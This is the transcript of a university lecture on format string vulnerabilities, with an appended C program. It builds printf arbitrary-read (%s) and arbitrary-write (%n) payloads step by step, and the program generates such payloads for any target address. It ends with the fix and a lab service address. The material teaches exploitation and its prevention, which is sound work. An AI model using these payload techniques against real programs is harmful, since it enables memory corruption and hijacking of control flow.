Format String Vulnerabilities in CSE 545

Dive into the world of format string vulnerabilities with CSE 545 and explore how printf statements can be exploited to leak sensitive information and control program flow. Learn about the dangers of improper format string usage and how to prevent such vulnerabilities in your code.

  • Security
  • Exploitation
  • Programming
  • Vulnerabilities


Presentation Transcript


  1. CSE 545 Format String Vulnerabilities Tiffany Bao tbao@asu.edu

  2. Format String Vulnerabilities

  3. printf("%d %d %d %d %d %d %d %d\n", 1, 2, 3, 4, 5, 6, 7, 8); Output: 1 2 3 4 5 6 7 8

  4. printf("%d %d %d %d %d %d %d %d\n", 1, 2, 3, 4, 5, 6, 7, 8); Where printf finds each argument (x86-64 System V calling convention):
     1. rdi: &"%d %d %d %d %d %d %d %d\n"
     2. rsi: 1
     3. rdx: 2
     4. rcx: 3
     5. r8: 4
     6. r9: 5
     7. on the stack (6)
     8. on the stack (7)
     9. on the stack (8)

  5.-6. Same call and argument map as slide 4 (animation builds). It still prints the arguments: printf does not know how many were passed; each conversion consumes the next register, then the next 8-byte stack slot.

  7. printf("%d %d %d %d %d %d %d %d\n", 1, 2, 3, 4, 5, 6, 7, 8); Control this: the format string (argument 1, in rdi). The conversions decide what is read from rsi, rdx, rcx, r8, r9 and then from the stack slots, so an attacker-supplied format string can leak registers and the stack.

  8. char buf[] = "%llx %llx %llx %llx %llx %llx %llx %llx\n"; printf(buf);
     rsp     -> "%llx %llx %llx %llx %llx %llx %llx %llx\n" (buf)
     rbp     -> saved rbp
     rbp + 8 -> saved rip (return address)
     Conversions 1-5 print rsi, rdx, rcx, r8, r9; conversions 6-8 print the 8-byte slots at rsp, rsp + 8, rsp + 16, i.e. the start of buf itself.

  9. Change the 6th conversion to %s: "%llx %llx %llx %llx %llx %s %llx %llx\n". Argument 6 is the slot at rsp, the first 8 bytes of buf, and %s dereferences it as a char *.

  10. char buf[] = little_end(0x555555554708) + "%llx %llx %llx %llx %llx %s %llx %llx\n"; printf(buf); The slot at rsp now holds 0x555555554708, so %s would print the bytes at that address up to the first NUL: an arbitrary read.

  11. Targets worth reading this way: a GOT entry (a libc address), the stack canary.

  12. little_end(0x555555554708) = "\x08\x47\x55\x55\x55\x55\x00\x00". Its two trailing \x00 bytes terminate the C string, so with the address in front printf never reaches the conversions after it; the address has to go at the end.

  13. printf("m = %2$d, n = %1$d\n", n, m); Positional (direct parameter access) conversions: %2$d takes the second argument, %1$d the first.

  14. char buf[] = "%llx%llx%llx%llx%llx%llx%llx%11$s\n" + padding + little_end(0x555555554708); printf(buf);
     rsp      -> "%llx%llx"  (argument 6)
     rsp + 8  -> "%llx%llx"  (argument 7)
     rsp + 16 -> "%llx%llx"  (argument 8)
     rsp + 24 -> "%llx%11$"  (argument 9)
     rsp + 32 -> "s\n" + padding  (argument 10)
     rsp + 40 -> "\x08\x47\x55\x55\x55\x55\x00\x00"  (argument 11)
     rbp      -> saved rbp
     rbp + 8  -> saved rip (return address)
     %11$s reaches the address in the sixth stack slot, and the NUL bytes now come after every conversion.

  15. Arbitrary Read. Arbitrary Write?

  16. int n; printf("hello%n\n", &n); printf("n = %d\n", n); Output?

  17. Output: n = 5. %n writes the number of bytes printed so far into the int its argument points to.

  18. int n; printf("hello%n\n", &n); Control this: the format string. printf("n = %d\n", n); Whoever controls the format string controls where %n appears (the value written) and which argument slot supplies its pointer (the destination).

  19. char buf[] = "hello%n\n"; printf(buf);
     rsp     -> "hello%n\n"
     rbp     -> saved rbp
     rbp + 8 -> saved rip (return address)

  20. char buf[] = "hello%n\n"; printf(buf); No second argument was passed, so %n takes its pointer from rsi: write 5 to *rsi.

  21. char buf[] = "hello%n%n%n%n%n%n\n"; printf(buf); write 5 to *rsi, *rdx, *rcx, *r8, *r9, then to the pointers found in the stack slots.

  22. char buf[] = little_end(0x555555554708) + "hello%n%n%n%n%n%n\n"; printf(buf); rsp -> 0x555555554708: the sixth %n takes its pointer from the first stack slot, which now holds 0x555555554708; the first five still write through *rsi, *rdx, *rcx, *r8, *r9.

  23. char buf[] = little_end(0x555555554708) + "hello%x%x%x%x%x%n\n"; printf(buf); The five %x only print rsi, rdx, rcx, r8, r9 (no writes through garbage pointers); the %n then writes to the slot at rsp, 0x555555554708.

  24. Goal: [0x555555554708] = 1000. char buf[] = little_end(0x555555554708) + "hello%x%x%x%x%x%n\n"; printf(buf); Bytes printed before the write to 0x555555554708: 8 + 5 + len(rsi) + len(rdx) + len(rcx) + len(r8) + len(r9), where len() is the hex length of each register value. How to make this equal 1000?

  25. %[position$][flag][min width][.precision][length modifier][conversion specifier]
     long x = 10; printf("%010ld", x); Print x as a long int with a minimum width of 10 characters, zero-padded. Output: 0000000010

  26. Goal: [0x555555554708] = 1000. char buf[] = little_end(0x555555554708) + "%0200x%0200x%0200x%0200x%0200x%n\n"; printf(buf); Each %0200x prints exactly 200 bytes (a 32-bit value is at most 8 hex digits, so the width always wins), so the register contents no longer matter. Bytes printed before the %n: 8 + 5 x 200.

  27. Goal: [0x555555554708] = 1000. little_end(0x555555554708) = "\x08\x47\x55\x55\x55\x55\x00\x00" will break the format string: its \x00 bytes end the string before any conversion is parsed.

  28. Goal: [0x555555554708] = 1000. char buf[] = "%0200x%0200x%0200x%0200x%0200x%n\n" + little_end(0x555555554708); printf(buf);
     rsp     -> "%0200x%0200x%0200x%0200x%0200x%n\n"
             -> "\x08\x47\x55\x55\x55\x55\x00\x00"
     rbp     -> saved rbp
     rbp + 8 -> saved rip (return address)
     Moving the address to the end keeps the string intact, but now the pointer %n uses (argument 6, the slot at rsp) is the first 8 bytes of the format string, not the address.

  29. Goal: [0x555555554708] = 1000. char buf[] = "%0200x%0200x%0200x%0200x%0200x%11$n\n" + padding + little_end(0x555555554708); printf(buf);
     rsp      -> "%0200x%0"  (argument 6)
     rsp + 8  -> "200x%020"  (argument 7)
     rsp + 16 -> "0x%0200x"  (argument 8)
     rsp + 24 -> "%0200x%1"  (argument 9)
     rsp + 32 -> "1$n\n" + padding  (argument 10)
     rsp + 40 -> "\x08\x47\x55\x55\x55\x55\x00\x00"  (argument 11)
     rbp      -> saved rbp
     rbp + 8  -> saved rip (return address)
     The padding places the address in the sixth stack slot, %11$n selects exactly that slot, and 5 x 200 = 1000 bytes have been printed when it runs, so 1000 is stored at 0x555555554708.

  30. Make sure that the user cannot provide the format string: printf(buf); -> printf("%s", buf);
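The read of slide 14 and the write of slide 29 use the same layout: conversions first, padding to an 8-byte boundary, the little-endian address last, and a positional %K$ whose K names the stack slot the address landed in. The C below is an added example written for this page, not the lecture's or the lab's code. It assumes exactly the slides' picture (printf's 6th argument is the 8-byte slot at rsp and buf starts there, so a pointer at offset off is argument 6 + off/8; FIRST_STACK_ARG is that 6), and the names place_addr, build_payload, build_fmt_read, build_fmt_write, count_before_n and n_counter_demo are chosen here. 0x555555554708 is the slides' target address. Nothing in it writes through a real payload; the %n demonstration uses a literal format with explicit arguments so its result is deterministic.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the lecture's code. Assumes the x86-64 System V picture
 * on the slides: conversions 1-5 read rsi, rdx, rcx, r8, r9; conversion 6 reads
 * the 8-byte slot at rsp, where buf starts. So a pointer stored at 8-byte-aligned
 * offset off inside the format string is positional argument 6 + off/8. */
#define FIRST_STACK_ARG 6

/* Pad with 'A' to an 8-byte boundary and append addr little-endian. It goes
 * last because its \x00 bytes would end the string early (slide 27).
 * Returns the positional index that reaches it, or -1 if out is too small. */
static int place_addr(char *out, size_t outsz, size_t *len, uint64_t addr)
{
    size_t off = *len;
    while (off % 8 != 0) {
        if (off + 1 >= outsz) return -1;
        out[off++] = 'A';
    }
    if (off + 8 >= outsz) return -1;
    for (int i = 0; i < 8; i++)
        out[off + i] = (char)((addr >> (8 * i)) & 0xff);
    *len = off + 8;
    out[*len] = '\0';        /* convenience only: the payload itself contains NULs */
    return FIRST_STACK_ARG + (int)(off / 8);
}

/* prefix + "%K$" + conv + padding + addr. K changes the string length when its
 * digit count changes, so build, see where the address landed, and retry until
 * K is stable. Returns the payload length in bytes and stores K in *arg_index. */
static int build_payload(const char *prefix, char conv, uint64_t addr,
                         char *out, size_t outsz, int *arg_index)
{
    int guess = FIRST_STACK_ARG;
    for (int tries = 0; tries < 4; tries++) {
        int n = snprintf(out, outsz, "%s%%%d$%c", prefix, guess, conv);
        if (n < 0 || (size_t)n >= outsz) return -1;
        size_t len = (size_t)n;
        int k = place_addr(out, outsz, &len, addr);
        if (k < 0) return -1;
        if (k == guess) { *arg_index = k; return (int)len; }
        guess = k;
    }
    return -1;
}

/* Slide 14's read: "%K$s" + pad + addr makes printf(buf) print the C string at addr. */
int build_fmt_read(uint64_t addr, char *out, size_t outsz, int *arg_index)
{
    return build_payload("", 's', addr, out, outsz, arg_index);
}

/* Slide 29's write: five zero-padded %x, one per register argument, print exactly
 * `value` bytes, then "%K$n" stores that count into the int at addr. %x emits at
 * most 8 digits, so every width >= 8 is honoured exactly; hence value >= 40.
 * For value = 1000 this is the slide's 5 x %0200x. */
int build_fmt_write(uint64_t addr, unsigned value, char *out, size_t outsz,
                    int *arg_index)
{
    if (value < 5 * 8) return -1;
    char widths[96];
    size_t len = 0;
    for (int i = 0; i < 5; i++)
        len += (size_t)snprintf(widths + len, sizeof widths - len, "%%0%ux",
                                value / 5 + (i == 0 ? value % 5 : 0));
    return build_payload(widths, 'n', addr, out, outsz, arg_index);
}

/* Slides 24-26 arithmetic, checked without touching a real target: run only the
 * width part of a write payload (before "%K$n") with throw-away register values
 * and return the byte count %n would store. */
int count_before_n(const char *payload)
{
    const char *dollar = strstr(payload, "$n");
    if (dollar == NULL) return -1;
    const char *pct = dollar;
    while (pct > payload && *pct != '%') pct--;
    char fmt[128];
    size_t plen = (size_t)(pct - payload);
    if (plen >= sizeof fmt) return -1;
    memcpy(fmt, payload, plen);
    fmt[plen] = '\0';
    return snprintf(NULL, 0, fmt, 1u, 2u, 3u, 4u, 5u);
}

/* %n on a format literal (slides 16-17): all conversions positional and every
 * argument up to %6$n referenced, so this also passes glibc's fortified checks. */
int n_counter_demo(void)
{
    int stored = -1;
    char sink[1100];
    snprintf(sink, sizeof sink, "%1$0200x%2$0200x%3$0200x%4$0200x%5$0200x%6$n",
             1u, 2u, 3u, 4u, 5u, &stored);
    return stored;                                   /* 1000 */
}

int main(void)
{
    char payload[128];
    int k, len = build_fmt_write(0x555555554708ULL, 1000, payload, sizeof payload, &k);
    printf("%d-byte payload, %%%d$n reaches the address, %d bytes precede %%n:\n",
           len, k, count_before_n(payload));
    for (int i = 0; i < len; i++) printf("\\x%02x", (unsigned char)payload[i]);
    printf("\n%%n on a literal format stored %d\n", n_counter_demo());
    return 0;
}
```

For the slides' target, build_fmt_write yields the 48-byte string "%0200x%0200x%0200x%0200x%0200x%11$n" + "AAAAA" + "\x08\x47\x55\x55\x55\x55\x00\x00" (argument 11, 1000 bytes printed before the %n), and build_fmt_read yields "%7$sAAAA" + the same address. Send the payload by length, not as a C string, since it contains NULs. Two caveats for the lab: if buf does not start exactly at rsp, find the real offset first by dumping slots with "%6$llx", "%7$llx", ... as slide 8 does, and adjust FIRST_STACK_ARG; and a binary built with _FORTIFY_SOURCE gets a glibc printf that aborts on %n when the format lives in writable memory and on %N$ formats that skip argument positions (6-10 here), so the same payload that works on the lab service may die on a hardened build. The fix on slide 30, printf("%s", buf), removes the whole class: buf is then data, and its %n and %11$s are printed rather than interpreted.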

  31. In-class Lab

  32. Service IP: 107.21.135.41 Port: 7777 Service file: https://cse545.tiffanybao.com/labs/week7/format_string.c https://cse545.tiffanybao.com/labs/week7/format_string
